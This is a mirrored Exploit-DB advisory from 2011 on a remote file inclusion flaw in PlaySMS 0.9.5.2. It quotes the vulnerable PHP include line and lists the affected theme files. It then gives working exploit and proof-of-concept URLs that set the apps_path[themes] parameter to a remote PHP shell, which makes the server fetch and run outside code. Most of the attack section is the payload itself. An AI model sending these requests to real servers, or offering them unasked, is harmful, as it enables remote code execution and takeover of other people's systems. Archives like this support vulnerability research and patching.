bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/17792.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

49 lines
No EOL
1.7 KiB
Text
Raw Blame History

=============================================================================================================
[o] PlaySMS <= Remote File Inclusion Vulnerability
Software : PlaySMS ver 0.9.5.2
Vendor : http://playsms.org/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
=============================================================================================================
[o] Vulnerability
<?php include $apps_path['themes']."/".$themes_module."/header.php"; ?>
affected all this files
web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php
[o] Exploit
http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]
[o] PoC
http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?
=============================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{
=============================================================================================================
[o] September 05 2011 - Papua, Indonesia
Reference in a new issue View git blame Copy permalink